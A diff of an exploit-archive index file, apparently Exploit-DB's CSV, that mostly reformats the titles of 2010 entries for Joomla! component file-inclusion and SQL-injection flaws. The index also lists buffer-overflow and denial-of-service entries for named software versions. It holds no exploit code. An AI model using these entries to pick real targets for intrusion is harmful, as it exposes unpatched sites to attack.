Inclusion",2010-04-12,JIKO,php,webapps,0 12165,platforms/multiple/dos/12165.txt,"PHP 5.3.0 - getopt() Denial of Service",2010-04-12,Napst3r,multiple,dos,0 -12166,platforms/php/webapps/12166.txt,"Joomla! Component Web TV com_webtv - Local File Inclusion",2010-04-12,AntiSecurity,php,webapps,0 -12167,platforms/php/webapps/12167.txt,"Joomla! Component Horoscope com_horoscope - Local File Inclusion",2010-04-12,AntiSecurity,php,webapps,0 -12168,platforms/php/webapps/12168.txt,"Joomla! Component Arcade Games com_arcadegames - Local File Inclusion",2010-04-12,AntiSecurity,php,webapps,0 -12169,platforms/php/webapps/12169.txt,"Joomla! Component Flashgames com_Flashgames - Local File Inclusion",2010-04-12,AntiSecurity,php,webapps,0 -12170,platforms/php/webapps/12170.txt,"Joomla! Component AddressBook com_AddressBook - Local File Inclusion",2010-04-12,AntiSecurity,php,webapps,0 -12171,platforms/php/webapps/12171.txt,"Joomla! Component Easy Ad Banner com_advertising - Local File Inclusion",2010-04-12,AntiSecurity,php,webapps,0 -12172,platforms/php/webapps/12172.txt,"Joomla! Component CV Maker com_cvmaker - Local File Inclusion",2010-04-12,AntiSecurity,php,webapps,0 -12173,platforms/php/webapps/12173.txt,"Joomla! Component My Files com_myfiles - Local File Inclusion",2010-04-12,AntiSecurity,php,webapps,0 -12174,platforms/php/webapps/12174.txt,"Joomla! Component Online Exam com_onlineexam - Local File Inclusion",2010-04-12,AntiSecurity,php,webapps,0 -12175,platforms/php/webapps/12175.txt,"Joomla! Component JoomMail com_joommail - Local File Inclusion",2010-04-12,AntiSecurity,php,webapps,0 -12176,platforms/php/webapps/12176.txt,"Joomla! Component Memory Book com_memory - Local File Inclusion",2010-04-12,AntiSecurity,php,webapps,0 -12177,platforms/php/webapps/12177.txt,"Joomla! Component Online Market com_market - Local File Inclusion",2010-04-12,AntiSecurity,php,webapps,0 -12178,platforms/php/webapps/12178.txt,"Joomla! Component Digital Diary com_diary - Local File Inclusion",2010-04-12,AntiSecurity,php,webapps,0 +12166,platforms/php/webapps/12166.txt,"Joomla! Component 'com_webtv' - Local File Inclusion",2010-04-12,AntiSecurity,php,webapps,0 +12167,platforms/php/webapps/12167.txt,"Joomla! Component 'com_horoscope' - Local File Inclusion",2010-04-12,AntiSecurity,php,webapps,0 +12168,platforms/php/webapps/12168.txt,"Joomla! Component 'com_arcadegames' - Local File Inclusion",2010-04-12,AntiSecurity,php,webapps,0 +12169,platforms/php/webapps/12169.txt,"Joomla! Component 'com_Flashgames' - Local File Inclusion",2010-04-12,AntiSecurity,php,webapps,0 +12170,platforms/php/webapps/12170.txt,"Joomla! Component 'com_AddressBook' - Local File Inclusion",2010-04-12,AntiSecurity,php,webapps,0 +12171,platforms/php/webapps/12171.txt,"Joomla! Component 'com_advertising' - Local File Inclusion",2010-04-12,AntiSecurity,php,webapps,0 +12172,platforms/php/webapps/12172.txt,"Joomla! Component 'com_cvmaker' - Local File Inclusion",2010-04-12,AntiSecurity,php,webapps,0 +12173,platforms/php/webapps/12173.txt,"Joomla! Component 'com_myfiles' - Local File Inclusion",2010-04-12,AntiSecurity,php,webapps,0 +12174,platforms/php/webapps/12174.txt,"Joomla! Component 'com_onlineexam' - Local File Inclusion",2010-04-12,AntiSecurity,php,webapps,0 +12175,platforms/php/webapps/12175.txt,"Joomla! Component 'com_joommail' - Local File Inclusion",2010-04-12,AntiSecurity,php,webapps,0 +12176,platforms/php/webapps/12176.txt,"Joomla! Component 'com_memory' - Local File Inclusion",2010-04-12,AntiSecurity,php,webapps,0 +12177,platforms/php/webapps/12177.txt,"Joomla! Component 'com_market' - Local File Inclusion",2010-04-12,AntiSecurity,php,webapps,0 +12178,platforms/php/webapps/12178.txt,"Joomla! Component 'com_diary' - Local File Inclusion",2010-04-12,AntiSecurity,php,webapps,0 12179,platforms/php/webapps/12179.txt,"FusionForge 5.0 - Multiple Remote File Inclusion",2010-04-12,"cr4wl3r ",php,webapps,0 -12180,platforms/php/webapps/12180.txt,"Joomla! Component com_worldrates - Local File Inclusion",2010-04-12,AntiSecurity,php,webapps,0 -12181,platforms/php/webapps/12181.txt,"Joomla! Component com_record - Local File Inclusion",2010-04-12,AntiSecurity,php,webapps,0 -12182,platforms/php/webapps/12182.txt,"Joomla! Component com_sweetykeeper - Local File Inclusion",2010-04-12,AntiSecurity,php,webapps,0 -12183,platforms/php/webapps/12183.txt,"Joomla! Component com_jdrugstopics - SQL Injection",2010-04-12,SadHaCkEr,php,webapps,0 -12184,platforms/php/webapps/12184.txt,"Joomla! Component com_sermonspeaker - SQL Injection",2010-04-12,SadHaCkEr,php,webapps,0 -12185,platforms/php/webapps/12185.txt,"Joomla! Component com_flexicontent - Local File",2010-04-12,eidelweiss,php,webapps,0 +12180,platforms/php/webapps/12180.txt,"Joomla! Component 'com_worldrates' - Local File Inclusion",2010-04-12,AntiSecurity,php,webapps,0 +12181,platforms/php/webapps/12181.txt,"Joomla! Component 'com_record' - Local File Inclusion",2010-04-12,AntiSecurity,php,webapps,0 +12182,platforms/php/webapps/12182.txt,"Joomla! Component 'com_sweetykeeper' - Local File Inclusion",2010-04-12,AntiSecurity,php,webapps,0 +12183,platforms/php/webapps/12183.txt,"Joomla! Component 'com_jdrugstopics' - SQL Injection",2010-04-12,SadHaCkEr,php,webapps,0 +12184,platforms/php/webapps/12184.txt,"Joomla! Component 'com_sermonspeaker' - SQL Injection",2010-04-12,SadHaCkEr,php,webapps,0 +12185,platforms/php/webapps/12185.txt,"Joomla! Component 'com_flexicontent' - Local File",2010-04-12,eidelweiss,php,webapps,0 12187,platforms/php/webapps/12187.txt,"Vieassociative Openmairie 1.01 Beta - (Remote File Inclusion / Local File Inclusion) Multiple File Inclusion",2010-04-12,"cr4wl3r ",php,webapps,0 12188,platforms/multiple/dos/12188.txt,"VMware Remote Console e.x.p build-158248 - Format String",2010-04-12,"Alexey Sintsov",multiple,dos,0 12189,platforms/windows/local/12189.php,"PHP 6.0 Dev - str_transliterate() Buffer Overflow (NX + ASLR Bypass)",2010-04-13,ryujin,windows,local,0 -12190,platforms/php/webapps/12190.txt,"Joomla! Component Jvehicles - (aid) SQL Injection",2010-04-13,"Don Tukulesto",php,webapps,0 -12191,platforms/php/webapps/12191.txt,"Joomla! Component com_jp_jobs 1.2.0 - 'id' SQL Injection",2010-04-13,v3n0m,php,webapps,0 +12190,platforms/php/webapps/12190.txt,"Joomla! Component 'com_jvehicles' - 'aid' Parameter SQL Injection",2010-04-13,"Don Tukulesto",php,webapps,0 +12191,platforms/php/webapps/12191.txt,"Joomla! Component 'com_jp_jobs' 1.2.0 - 'id' Parameter SQL Injection",2010-04-13,v3n0m,php,webapps,0 12192,platforms/php/webapps/12192.txt,"Blog System 1.5 - Multiple Vulnerabilities",2010-04-13,"cp77fk4r ",php,webapps,0 12193,platforms/php/webapps/12193.txt,"Openurgence vaccin 1.03 - (Remote File Inclusion / Local File Inclusion) Multiple File Inclusion",2010-04-13,"cr4wl3r ",php,webapps,0 12194,platforms/php/webapps/12194.txt,"Police Municipale Open Main Courante 1.01beta - (Remote File Inclusion / Local File Inclusion) Multiple File Inclusion",2010-04-13,"cr4wl3r ",php,webapps,0 @@ -11150,7 +11150,7 @@ id,file,description,date,author,platform,type,port 12197,platforms/asp/webapps/12197.txt,"Mp3 MuZik - DataBase Download",2010-04-13,indoushka,asp,webapps,0 12198,platforms/php/webapps/12198.txt,"Games Script - (Galore) Backup Dump",2010-04-13,indoushka,php,webapps,0 12199,platforms/asp/webapps/12199.txt,"My School Script - Data Base Download",2010-04-13,indoushka,asp,webapps,0 -12200,platforms/php/webapps/12200.txt,"Joomla! Component com_QPersonel - SQL Injection",2010-04-13,Valentin,php,webapps,0 +12200,platforms/php/webapps/12200.txt,"Joomla! Component 'com_QPersonel' - SQL Injection",2010-04-13,Valentin,php,webapps,0 12201,platforms/windows/dos/12201.html,"MagnetoSoft DNS 4.0.0.9 - ActiveX DNSLookupHostWithServer (PoC)",2010-04-13,s4squatch,windows,dos,0 12202,platforms/windows/remote/12202.html,"MagnetoSoft ICMP 4.0.0.18 - ActiveX AddDestinationEntry Buffer Overflow",2010-04-13,s4squatch,windows,remote,0 12203,platforms/windows/remote/12203.html,"MagnetoSoft SNTP 4.0.0.7 - ActiveX SntpGetReply Buffer Overflow",2010-04-13,s4squatch,windows,remote,0 @@ -11173,16 +11173,16 @@ id,file,description,date,author,platform,type,port 12227,platforms/php/webapps/12227.txt,"YUI Images Script - Arbitrary File Upload",2010-04-14,Mr.P3rfekT,php,webapps,0 12228,platforms/windows/dos/12228.py,"MovieLibrary 1.4.401 - Local Denial of Service (.dmv)",2010-04-14,anonymous,windows,dos,0 12229,platforms/windows/dos/12229.py,"Book Library 1.4.162 - Local Denial of Service (.bkd)",2010-04-14,anonymous,windows,dos,0 -12230,platforms/php/webapps/12230.txt,"Joomla! Component wgPicasa com_wgpicasa - Local File Inclusion",2010-04-14,AntiSecurity,php,webapps,0 -12231,platforms/php/webapps/12231.txt,"Joomla! Component S5 Clan Roster com_s5clanroster - Local File Inclusion",2010-04-14,AntiSecurity,php,webapps,0 -12232,platforms/php/webapps/12232.txt,"Joomla! Component Photo Battle com_photobattle - Local File Inclusion",2010-04-14,AntiSecurity,php,webapps,0 -12233,platforms/php/webapps/12233.txt,"Joomla! Component MT Fire Eagle com_mtfireeagle - Local File Inclusion",2010-04-14,AntiSecurity,php,webapps,0 -12234,platforms/php/webapps/12234.txt,"Joomla! Component Media Mall Factory com_mediamall - Blind SQL Injection",2010-04-14,AntiSecurity,php,webapps,0 -12235,platforms/php/webapps/12235.txt,"Joomla! Component Love Factory com_lovefactory - Local File Inclusion",2010-04-14,AntiSecurity,php,webapps,0 -12236,platforms/php/webapps/12236.txt,"Joomla! Component JA Comment com_jacomment - Local File Inclusion",2010-04-14,AntiSecurity,php,webapps,0 -12237,platforms/php/webapps/12237.txt,"Joomla! Component Delicious BookMarks com_delicious - Local File Inclusion",2010-04-14,AntiSecurity,php,webapps,0 -12238,platforms/php/webapps/12238.txt,"Joomla! Component Deluxe Blog Factory com_blogfactory - Local File Inclusion",2010-04-14,AntiSecurity,php,webapps,0 -12239,platforms/php/webapps/12239.txt,"Joomla! Component BeeHeard Lite com_beeheard - Local File Inclusion",2010-04-14,AntiSecurity,php,webapps,0 +12230,platforms/php/webapps/12230.txt,"Joomla! Component 'com_wgpicasa' - Local File Inclusion",2010-04-14,AntiSecurity,php,webapps,0 +12231,platforms/php/webapps/12231.txt,"Joomla! Component 'com_s5clanroster' - Local File Inclusion",2010-04-14,AntiSecurity,php,webapps,0 +12232,platforms/php/webapps/12232.txt,"Joomla! Component 'com_photobattle' - Local File Inclusion",2010-04-14,AntiSecurity,php,webapps,0 +12233,platforms/php/webapps/12233.txt,"Joomla! Component 'com_mtfireeagle' - Local File Inclusion",2010-04-14,AntiSecurity,php,webapps,0 +12234,platforms/php/webapps/12234.txt,"Joomla! Component 'com_mediamall' - Blind SQL Injection",2010-04-14,AntiSecurity,php,webapps,0 +12235,platforms/php/webapps/12235.txt,"Joomla! Component 'com_lovefactory' - Local File Inclusion",2010-04-14,AntiSecurity,php,webapps,0 +12236,platforms/php/webapps/12236.txt,"Joomla! Component 'com_jacomment' - Local File Inclusion",2010-04-14,AntiSecurity,php,webapps,0 +12237,platforms/php/webapps/12237.txt,"Joomla! Component 'com_delicious' - Local File Inclusion",2010-04-14,AntiSecurity,php,webapps,0 +12238,platforms/php/webapps/12238.txt,"Joomla! Component 'com_blogfactory' - Local File Inclusion",2010-04-14,AntiSecurity,php,webapps,0 +12239,platforms/php/webapps/12239.txt,"Joomla! Component 'com_beeheard' - Local File Inclusion",2010-04-14,AntiSecurity,php,webapps,0 12240,platforms/windows/dos/12240.py,"Mocha LPD 1.9 - Remote Buffer Overflow Denial of Service (PoC)",2010-04-14,mr_me,windows,dos,0 15732,platforms/linux/dos/15732.txt,"FontForge - '.BDF' Font File Stack Based Buffer Overflow",2010-12-14,"Ulrik Persson",linux,dos,0 12241,platforms/php/webapps/12241.txt,"Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerabilities",2010-04-14,eidelweiss,php,webapps,0 @@ -11191,7 +11191,7 @@ id,file,description,date,author,platform,type,port 12244,platforms/windows/remote/12244.txt,"iMesh 7.1.0.x - 'IMWeb.dll 7.0.0.x' Remote Heap Overflow",2007-12-18,rgod,windows,remote,0 20109,platforms/windows/local/20109.rb,"Photodex ProShow Producer 5.0.3256 - load File Handling Buffer Overflow (Metasploit)",2012-07-27,Metasploit,windows,local,0 12245,platforms/php/webapps/12245.txt,"Softbiz B2B trading Marketplace Script - buyers_subcategories SQL Injection",2010-04-15,"AnGrY BoY",php,webapps,0 -12246,platforms/php/webapps/12246.txt,"Joomla! Component com_iproperty 1.5.3 - 'id' SQL Injection",2010-04-15,v3n0m,php,webapps,0 +12246,platforms/php/webapps/12246.txt,"Joomla! Component 'com_iproperty' 1.5.3 - 'id' Parameter SQL Injection",2010-04-15,v3n0m,php,webapps,0 12247,platforms/windows/remote/12247.html,"Magneto Net Resource ActiveX 4.0.0.5 - NetFileClose Exploit (Universal)",2010-04-15,dookie,windows,remote,0 12248,platforms/windows/remote/12248.html,"Magneto Net Resource ActiveX 4.0.0.5 - NetConnectionEnum Exploit (Universal)",2010-04-15,dookie,windows,remote,0 12249,platforms/php/webapps/12249.txt,"60cycleCMS 2.5.2 - (DOCUMENT_ROOT) Multiple Local File Inclusion",2010-04-15,eidelweiss,php,webapps,0 @@ -11201,7 +11201,7 @@ id,file,description,date,author,platform,type,port 12254,platforms/php/webapps/12254.txt,"FCKEditor Core - (FileManager test.html) Arbitrary File Upload (1)",2010-04-16,Mr.MLL,php,webapps,0 12255,platforms/windows/local/12255.rb,"Winamp 5.572 - whatsnew.txt SEH (Metasploit)",2010-04-16,blake,windows,local,0 12256,platforms/php/webapps/12256.txt,"ilchClan 1.0.5B - SQL Injection",2010-04-16,"Easy Laster",php,webapps,0 -12257,platforms/php/webapps/12257.txt,"Joomla! Component com_manager 1.5.3 - 'id' SQL Injection",2010-04-16,"Islam DefenDers Mr.HaMaDa",php,webapps,0 +12257,platforms/php/webapps/12257.txt,"Joomla! Component 'com_manager' 1.5.3 - 'id' Parameter SQL Injection",2010-04-16,"Islam DefenDers Mr.HaMaDa",php,webapps,0 12258,platforms/windows/dos/12258.py,"Microsoft Windows - SMB Client-Side Bug PoC (MS10-006)",2010-04-16,"laurent gaffie",windows,dos,0 12259,platforms/php/dos/12259.php,"PHP 5.3.x - Denial of Service",2010-04-16,ITSecTeam,php,dos,0 12260,platforms/php/webapps/12260.txt,"SIESTTA 2.0 - (Local File Inclusion / Cross-Site Scripting) Multiple Vulnerabilities",2010-04-16,JosS,php,webapps,0 @@ -11213,8 +11213,8 @@ id,file,description,date,author,platform,type,port 12266,platforms/php/webapps/12266.txt,"60 cycleCMS 2.5.2 - Cross-Site Request Forgery (Change 'Username' and Password)",2010-04-16,EL-KAHINA,php,webapps,0 12267,platforms/php/webapps/12267.txt,"WebAdmin - Arbitrary File Upload",2010-04-16,DigitALL,php,webapps,0 12268,platforms/php/webapps/12268.txt,"Uploader 0.7 - Arbitrary File Upload",2010-04-16,DigitALL,php,webapps,0 -12269,platforms/php/webapps/12269.txt,"Joomla! Component com_joltcard - SQL Injection",2010-04-16,Valentin,php,webapps,0 -12270,platforms/php/webapps/12270.txt,"Joomla! Component com_pandafminigames - SQL Injection",2010-04-16,Valentin,php,webapps,0 +12269,platforms/php/webapps/12269.txt,"Joomla! Component 'com_joltcard' - SQL Injection",2010-04-16,Valentin,php,webapps,0 +12270,platforms/php/webapps/12270.txt,"Joomla! Component 'com_pandafminigames' - SQL Injection",2010-04-16,Valentin,php,webapps,0 12272,platforms/php/webapps/12272.txt,"PHP RapidKill Pro 5.x - Arbitrary File Upload",2010-04-17,DigitALL,php,webapps,0 12273,platforms/windows/dos/12273.py,"Microsoft Windows 7/2008R2 - SMB Client Trans2 Stack Overflow 10-020 (PoC)",2010-04-17,"laurent gaffie",windows,dos,0 12274,platforms/windows/dos/12274.py,"Multiple Vendor AgentX++ - Stack Buffer Overflow",2010-04-17,ZSploit.com,windows,dos,0 @@ -11223,16 +11223,16 @@ id,file,description,date,author,platform,type,port 12278,platforms/php/webapps/12278.txt,"Alegro 1.2.1 - SQL Injection",2010-04-18,indoushka,php,webapps,0 12279,platforms/php/webapps/12279.txt,"eclime 1.1 - Bypass / Create and Download Backup",2010-04-18,indoushka,php,webapps,0 12280,platforms/php/webapps/12280.txt,"dl_stats - Multiple Vulnerabilities",2010-04-18,"Valentin Hoebel",php,webapps,0 -12282,platforms/php/webapps/12282.txt,"Joomla! Component Archery Scores (com_archeryscores) 1.0.6 - Local File Inclusion",2010-04-18,"wishnusakti + inc0mp13te",php,webapps,0 -12283,platforms/php/webapps/12283.txt,"Joomla! Component ZiMB Comment com_zimbcomment - Local File Inclusion",2010-04-18,AntiSecurity,php,webapps,0 -12284,platforms/php/webapps/12284.txt,"Joomla! Component ZiMB Manager com_zimbcore - Local File Inclusion",2010-04-18,AntiSecurity,php,webapps,0 -12285,platforms/php/webapps/12285.txt,"Joomla! Component Gadget Factory com_gadgetfactory - Local File Inclusion",2010-04-18,AntiSecurity,php,webapps,0 -12286,platforms/php/webapps/12286.txt,"Joomla! Component Matamko com_matamko - Local File Inclusion",2010-04-18,AntiSecurity,php,webapps,0 -12287,platforms/php/webapps/12287.txt,"Joomla! Component Multiple Root com_multiroot - Local File Inclusion",2010-04-18,AntiSecurity,php,webapps,0 -12288,platforms/php/webapps/12288.txt,"Joomla! Component Multiple Map com_multimap - Local File Inclusion",2010-04-18,AntiSecurity,php,webapps,0 -12289,platforms/php/webapps/12289.txt,"Joomla! Component Contact Us Draw Root Map com_drawroot - Local File Inclusion",2010-04-18,AntiSecurity,php,webapps,0 -12290,platforms/php/webapps/12290.txt,"Joomla! Component Contact Us Google Map com_google - Local File Inclusion",2010-04-18,AntiSecurity,php,webapps,0 -12291,platforms/php/webapps/12291.txt,"Joomla! Component iF surfALERT com_if_surfalert - Local File Inclusion",2010-04-18,AntiSecurity,php,webapps,0 +12282,platforms/php/webapps/12282.txt,"Joomla! Component 'com_archeryscores' 1.0.6 - Local File Inclusion",2010-04-18,"wishnusakti + inc0mp13te",php,webapps,0 +12283,platforms/php/webapps/12283.txt,"Joomla! Component 'com_zimbcomment' - Local File Inclusion",2010-04-18,AntiSecurity,php,webapps,0 +12284,platforms/php/webapps/12284.txt,"Joomla! Component 'com_zimbcore' - Local File Inclusion",2010-04-18,AntiSecurity,php,webapps,0 +12285,platforms/php/webapps/12285.txt,"Joomla! Component 'com_gadgetfactory' - Local File Inclusion",2010-04-18,AntiSecurity,php,webapps,0 +12286,platforms/php/webapps/12286.txt,"Joomla! Component 'com_matamko' - Local File Inclusion",2010-04-18,AntiSecurity,php,webapps,0 +12287,platforms/php/webapps/12287.txt,"Joomla! Component 'com_multiroot' - Local File Inclusion",2010-04-18,AntiSecurity,php,webapps,0 +12288,platforms/php/webapps/12288.txt,"Joomla! Component 'com_multimap' - Local File Inclusion",2010-04-18,AntiSecurity,php,webapps,0 +12289,platforms/php/webapps/12289.txt,"Joomla! Component 'com_drawroot' - Local File Inclusion",2010-04-18,AntiSecurity,php,webapps,0 +12290,platforms/php/webapps/12290.txt,"Joomla! Component 'com_google' - Local File Inclusion",2010-04-18,AntiSecurity,php,webapps,0 +12291,platforms/php/webapps/12291.txt,"Joomla! Component 'com_if_surfalert' - Local File Inclusion",2010-04-18,AntiSecurity,php,webapps,0 12292,platforms/php/webapps/12292.txt,"Flex File Manager - Arbitrary File Upload",2010-04-19,Mr.MLL,php,webapps,0 12293,platforms/windows/local/12293.py,"TweakFS 1.0 - (FSX Edition) Stack Buffer Overflow",2010-04-19,corelanc0d3r,windows,local,0 12294,platforms/windows/dos/12294.txt,"avtech software 'avc781viewer.dll' ActiveX - Multiple Vulnerabilities",2010-04-19,LiquidWorm,windows,dos,0 @@ -11240,13 +11240,13 @@ id,file,description,date,author,platform,type,port 12296,platforms/php/webapps/12296.txt,"Openreglement 1.04 - (Remote File Inclusion / Local File Inclusion) Multiple File Inclusion",2010-04-19,"cr4wl3r ",php,webapps,0 12297,platforms/hardware/dos/12297.txt,"Huawei EchoLife HG520c - Denial of Service / Modem Reset",2010-04-19,hkm,hardware,dos,0 12298,platforms/hardware/remote/12298.txt,"Huawei EchoLife HG520 - Remote Information Disclosure",2010-04-19,hkm,hardware,remote,0 -12299,platforms/php/webapps/12299.txt,"Joomla! Component GBU FACEBOOK 1.0.5 - SQL Injection",2010-04-19,kaMtiEz,php,webapps,0 +12299,platforms/php/webapps/12299.txt,"Joomla! Component 'com_gbufacebook' 1.0.5 - SQL Injection",2010-04-19,kaMtiEz,php,webapps,0 12301,platforms/php/webapps/12301.txt,"CMS Ariadna 2009 - SQL Injection",2010-04-19,"Andrés Gómez",php,webapps,0 12302,platforms/windows/dos/12302.html,"HP Operations Manager 8.16 - 'srcvw4.dll' LoadFile()/SaveFile() Remote Unicode Stack Overflow (PoC)",2010-04-20,mr_me,windows,dos,0 12303,platforms/php/webapps/12303.pl,"MusicBox 3.3 - SQL Injection",2010-04-20,Ctacok,php,webapps,0 12304,platforms/multiple/remote/12304.txt,"Multi-Threaded HTTP Server 1.1 - Directory Traversal (1)",2010-04-20,chr1x,multiple,remote,0 -12305,platforms/php/webapps/12305.txt,"Joomla! Component com_jnewspaper - 'cid' SQL Injection",2010-04-20,"Don Tukulesto",php,webapps,0 -12306,platforms/php/webapps/12306.txt,"Joomla! Component JTM Reseller 1.9 Beta - SQL Injection",2010-04-20,kaMtiEz,php,webapps,0 +12305,platforms/php/webapps/12305.txt,"Joomla! Component 'com_jnewspaper' - 'cid' Parameter SQL Injection",2010-04-20,"Don Tukulesto",php,webapps,0 +12306,platforms/php/webapps/12306.txt,"Joomla! Component 'com_jtm' 1.9 Beta - SQL Injection",2010-04-20,kaMtiEz,php,webapps,0 12308,platforms/windows/remote/12308.txt,"Multi-Threaded HTTP Server 1.1 - Source Disclosure",2010-04-20,Dr_IDE,windows,remote,0 12309,platforms/windows/remote/12309.txt,"Mongoose Web Server 2.8 - Multiple Directory Traversals",2010-04-20,Dr_IDE,windows,remote,0 12310,platforms/windows/remote/12310.txt,"Acritum Femitter 1.03 - Directory Traversal",2010-04-20,Dr_IDE,windows,remote,0 @@ -11254,15 +11254,15 @@ id,file,description,date,author,platform,type,port 12313,platforms/php/webapps/12313.txt,"Openregistrecil 1.02 - (Remote File Inclusion / Local File Inclusion) Multiple File Inclusion",2010-04-20,"cr4wl3r ",php,webapps,0 12314,platforms/windows/dos/12314.py,"Speed Commander 13.10 - '.zip' Memory Corruption",2010-04-20,TecR0c,windows,dos,0 12315,platforms/php/webapps/12315.txt,"v2marketplacescript Upload_images Script (-7777) - Arbitrary File Upload",2010-04-21,cyberlog,php,webapps,0 -12316,platforms/php/webapps/12316.txt,"Joomla! Component wmi (com_wmi) - Local File Inclusion",2010-04-21,"wishnusakti + inc0mp13te",php,webapps,0 -12317,platforms/php/webapps/12317.txt,"Joomla! Component OrgChart com_orgchart - Local File Inclusion",2010-04-21,AntiSecurity,php,webapps,0 -12318,platforms/php/webapps/12318.txt,"Joomla! Component Mms Blog com_mmsblog - Local File Inclusion",2010-04-21,AntiSecurity,php,webapps,0 +12316,platforms/php/webapps/12316.txt,"Joomla! Component 'com_wmi' - Local File Inclusion",2010-04-21,"wishnusakti + inc0mp13te",php,webapps,0 +12317,platforms/php/webapps/12317.txt,"Joomla! Component 'com_orgchart' - Local File Inclusion",2010-04-21,AntiSecurity,php,webapps,0 +12318,platforms/php/webapps/12318.txt,"Joomla! Component 'com_mmsblog' - Local File Inclusion",2010-04-21,AntiSecurity,php,webapps,0 12319,platforms/php/webapps/12319.txt,"e107 CMS 0.7.19 - Cross-Site Request Forgery",2010-04-21,"High-Tech Bridge SA",php,webapps,0 12320,platforms/windows/remote/12320.txt,"Viscom Software Movie Player Pro SDK ActiveX 6.8 - Remote Buffer Overflow",2010-04-21,shinnai,windows,remote,0 12322,platforms/php/webapps/12322.txt,"LightNEasy 3.1.x - Multiple Vulnerabilities",2010-04-21,ITSecTeam,php,webapps,0 12323,platforms/php/webapps/12323.txt,"wb news (webmobo) 2.3.3 - Persistent Cross-Site Scripting",2010-04-21,ITSecTeam,php,webapps,0 12324,platforms/multiple/dos/12324.py,"Multiple Browsers - Audio Tag Denial of Service",2010-04-21,"Chase Higgins",multiple,dos,0 -12325,platforms/php/webapps/12325.txt,"Joomla! Component com_portfolio - Local File Disclosure",2010-04-21,Mr.tro0oqy,php,webapps,0 +12325,platforms/php/webapps/12325.txt,"Joomla! Component 'com_portfolio' - Local File Disclosure",2010-04-21,Mr.tro0oqy,php,webapps,0 12326,platforms/windows/local/12326.py,"ZipGenius 6.3.1.2552 - 'zgtips.dll' Stack Buffer Overflow",2010-04-21,corelanc0d3r,windows,local,0 12329,platforms/asp/webapps/12329.txt,"CactuShop - User Invoices Persistent Cross-Site Scripting",2010-04-21,7Safe,asp,webapps,0 12330,platforms/php/webapps/12330.txt,"Apache OFBiz - Multiple Cross-Site Scripting",2010-04-21,"Lucas Apa",php,webapps,0 @@ -11274,7 +11274,7 @@ id,file,description,date,author,platform,type,port 12337,platforms/windows/dos/12337.c,"Microsoft Windows 2000/XP/2003 - 'win32k.sys' SfnINSTRING Local kernel Denial of Service",2010-04-22,MJ0011,windows,dos,0 12338,platforms/php/webapps/12338.txt,"Cacti 0.8.7e - SQL Injection",2010-04-22,"Nahuel Grisolia",php,webapps,0 12339,platforms/php/webapps/12339.txt,"Cacti 0.8.7e - OS Command Injection",2010-04-22,"Nahuel Grisolia",php,webapps,0 -12340,platforms/php/webapps/12340.txt,"Joomla! Component com_caddy - Exploit",2010-04-22,_SuBz3r0_,php,webapps,0 +12340,platforms/php/webapps/12340.txt,"Joomla! Component 'com_caddy' - Exploit",2010-04-22,_SuBz3r0_,php,webapps,0 12341,platforms/windows/dos/12341.txt,"EDraw Flowchart ActiveX Control 2.3 - (EDImage.ocx) Remote Denial of Service (IE)",2010-04-22,LiquidWorm,windows,dos,0 12342,platforms/windows/local/12342.pl,"EDraw Flowchart ActiveX Control 2.3 - (.edd parsing) Remote Buffer Overflow (PoC)",2010-04-22,LiquidWorm,windows,local,0 12343,platforms/multiple/remote/12343.txt,"Apache Tomcat 5.5.0 < 5.5.29 / 6.0.0 < 6.0.26 - Information Disclosure",2010-04-22,"Deniz Cevik",multiple,remote,0 @@ -11320,7 +11320,7 @@ id,file,description,date,author,platform,type,port 12396,platforms/php/webapps/12396.txt,"OpenCominterne 1.01 - Local File Inclusion",2010-04-26,"cr4wl3r ",php,webapps,0 12398,platforms/php/webapps/12398.txt,"Opencourrier 2.03beta - (Remote File Inclusion / Local File Inclusion) Multiple File Inclusion",2010-04-26,"cr4wl3r ",php,webapps,0 12399,platforms/php/webapps/12399.txt,"Uiga Personal Portal - 'index.php' (view) SQL Injection",2010-04-26,41.w4r10r,php,webapps,0 -12400,platforms/php/webapps/12400.txt,"Joomla! Component com_joomradio - SQL Injection",2010-04-26,Mr.tro0oqy,php,webapps,0 +12400,platforms/php/webapps/12400.txt,"Joomla! Component 'com_joomradio' - SQL Injection",2010-04-26,Mr.tro0oqy,php,webapps,0 12401,platforms/multiple/dos/12401.html,"WebKit 532.5 - Stack Exhaustion",2010-04-26,"Mathias Karlsson",multiple,dos,0 12402,platforms/php/webapps/12402.txt,"Kasseler CMS 2.0.5 - Bypass / Download Backup",2010-04-26,indoushka,php,webapps,0 12403,platforms/windows/local/12403.py,"IDEAL Administration 2010 10.2 - Local Buffer Overflow",2010-04-26,Dr_IDE,windows,local,0 @@ -11343,13 +11343,13 @@ id,file,description,date,author,platform,type,port 12423,platforms/php/webapps/12423.txt,"CLScript.com Classifieds Software - SQL Injection",2010-04-27,41.w4r10,php,webapps,0 12424,platforms/asp/webapps/12424.txt,"Acart 2.0 Shopping Cart - Software Backup Dump",2010-04-27,indoushka,asp,webapps,0 12425,platforms/windows/dos/12425.html,"Webkit (Apple Safari 4.0.5) - Blink Tag Stack Exhaustion Denial of Service",2010-04-27,Dr_IDE,windows,dos,0 -12426,platforms/php/webapps/12426.txt,"Joomla! Component Ultimate Portfolio com_ultimateportfolio - Local File Inclusion",2010-04-27,AntiSecurity,php,webapps,0 -12427,platforms/php/webapps/12427.txt,"Joomla! Component NoticeBoard com_noticeboard - Local File Inclusion",2010-04-27,AntiSecurity,php,webapps,0 -12428,platforms/php/webapps/12428.txt,"Joomla! Component SmartSite com_smartsite - Local File Inclusion",2010-04-27,AntiSecurity,php,webapps,0 -12429,platforms/php/webapps/12429.pl,"Joomla! Extension ABC com_abc - SQL Injection",2010-04-27,AntiSecurity,php,webapps,0 -12430,platforms/php/webapps/12430.txt,"Joomla! Component graphics (com_graphics) 1.0.6 - Local File Inclusion",2010-04-27,"wishnusakti + inc0mp13te",php,webapps,0 +12426,platforms/php/webapps/12426.txt,"Joomla! Component 'com_ultimateportfolio' - Local File Inclusion",2010-04-27,AntiSecurity,php,webapps,0 +12427,platforms/php/webapps/12427.txt,"Joomla! Component 'com_noticeboard' - Local File Inclusion",2010-04-27,AntiSecurity,php,webapps,0 +12428,platforms/php/webapps/12428.txt,"Joomla! Component 'com_smartsite' - Local File Inclusion",2010-04-27,AntiSecurity,php,webapps,0 +12429,platforms/php/webapps/12429.pl,"Joomla! Component 'com_abc' - SQL Injection",2010-04-27,AntiSecurity,php,webapps,0 +12430,platforms/php/webapps/12430.txt,"Joomla! Component 'com_graphics' 1.0.6 - Local File Inclusion",2010-04-27,"wishnusakti + inc0mp13te",php,webapps,0 